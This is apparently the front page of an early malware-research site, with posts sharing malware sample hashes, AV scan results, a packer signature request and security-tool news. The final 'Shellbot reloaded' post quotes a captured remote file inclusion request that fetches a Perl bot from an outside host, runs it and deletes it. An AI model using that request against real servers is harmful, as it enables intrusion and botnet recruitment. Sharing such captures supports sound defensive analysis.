Skip navigation.
Home
WARNING: This site contains samples of live malware. Use at your own risk.

Announcing Metasploit Framework 3 Alpha Release 3

|

Hop on over to the following link and grab your copy. Feedback is greatly appreciated:

http://metasploit.com/projects/Framework/msf3/

Downtime, maitenance and assorted emergencies

|

So you might have noticed that OffensiveComputing was acting strangely, broken database, or generally down during the last 24 hours. Basically several things happendd.

We use a vhost and it ran out of space (thanks for all the malware contributions!). A symptom of this is a database error. So I took steps to purchase more space which got increased by our provider sometime during the night. When I booted up my brain this morning I saw that both apache and the database daemons were not running for some reason and so I started them both and we are back up.

This illustrates a couple of issues. Primarily that I am not a web person/sysadmin and I have no interest in being one. (I got over that when geocities was still cool :)

packer request

| |

Does anyone out there have a userdb of packer signatures? (think peid) We have a working packer detector now that runs on anything thanks to the pelp project guys but its a little sparce on signatures. Ill be adding my own sigs but I thought i'd ask and see if anyone out there has any they are willing to donate. Sigs look like :

[Name of the Packer v1.0]
signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
ep_only = true

Thanks!

V.

sdbots from soinull

| |

Thanks to soinull for the big contribution.
Password is infected

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 6fc1e9e7942ba69aa7d4e252919a108e
SHA1SUM: 48e3941bdeff80273e474a2a6f0d033d73b4adf5
SHA256SUM: f000dde6db5d6188ba422b51c7908c9fc5fdad74cb1f3a6a24d75711e04595ae
A/V SCAN: Found Win32/Rbot
PACKER: PE_PATCH.PECOMPACT, PECBUNDLE, PECOMPACT
#################################

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 3780075cda61d6fc9487e412dc20d6bf
SHA1SUM: d0c5757874c24c22a272815c0e25e9d20434316f

Worm.Rays.A

| |

Thanks to Scarlet Pimpernell for the sample.

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 2a53b32f891e1ec1bf71a3f3746d4bbb
SHA1SUM: 846e2bcdc0a2e2911056b57948f533d1096a003f
SHA256SUM: e7f0f9351093d504f7a65f1980f4312e79e256275d02037d4106e10394e13fcb
A/V SCAN: Worm.Rays.A
#################################

big signature list

the_scourge was kind enough to send us a big giant list of malware signatures. We will be importing it soon as we can. This means we will have a bunch of signatures for which there is not an malware sample. Therefore if you happen to be searching a signature and you find a post but no sample and you have one, please be generous and attach it to the signature post.

Thanks!

V.

sdbot variant

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: d01799283d811fe24132a2914ac33f11
SHA1SUM: 916083e5d08ad213e321e6ad9bce774397732d08
SHA256SUM: 98b8843b596f29ccb8f45a7eb195056087da337fe927038e6021003d96bdd4f1
A/V SCAN: Clamav finds nothing
#################################

AntiVir Found nothing
ArcaVir Found Trojan.Rbot.Gen.224256.MX
Avast Found Win32:Rbot-AUY
AVG Antivirus Found IRC/BackDoor.SdBot.YDF
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing

Trojan.Win32.Agent.Q

| |

EDITED by Tebodell

2C2EE583.DLL
MD5SUM: 476d8b31bfd01f2d264f2133c47a3d37
SHA1SUM: ba5ff9dfbd0702e85799ed46dd3197691b4eb149
SHA256SUM: 1dc6daa68dc554d95db5d9506f7ccb4eb85750c93f90f3b1762d74a096257ae0

PACKER: UPX
REF: Submitted by MythX
DATE FOUND: 2/20/2006
VECTOR: Email
THREAT: Backdoor
CME #: N/A

Nepenthes & MWCollect Join Forces

| |

Great news for malware collectors! Stop by the sites for details..

http://www.mwcollect.org
http://nepenthes.sourceforge.net

Or click the handy links to the left of this.

Shellbot reloaded

| |

Found this probing the networks just now... more soon.

UPDATE: Mmm Google hunting..

GET phpfile.php?action=logout&siteurl=http://www.carteirovirtual.org/cmd.txt?&cmd=cd%20/tmp;\
GET%20http://www.athgroup.org/bot3.txt;perl%20bot3.txt;rm%20-rf%20bot3.txt? HTTP/1.0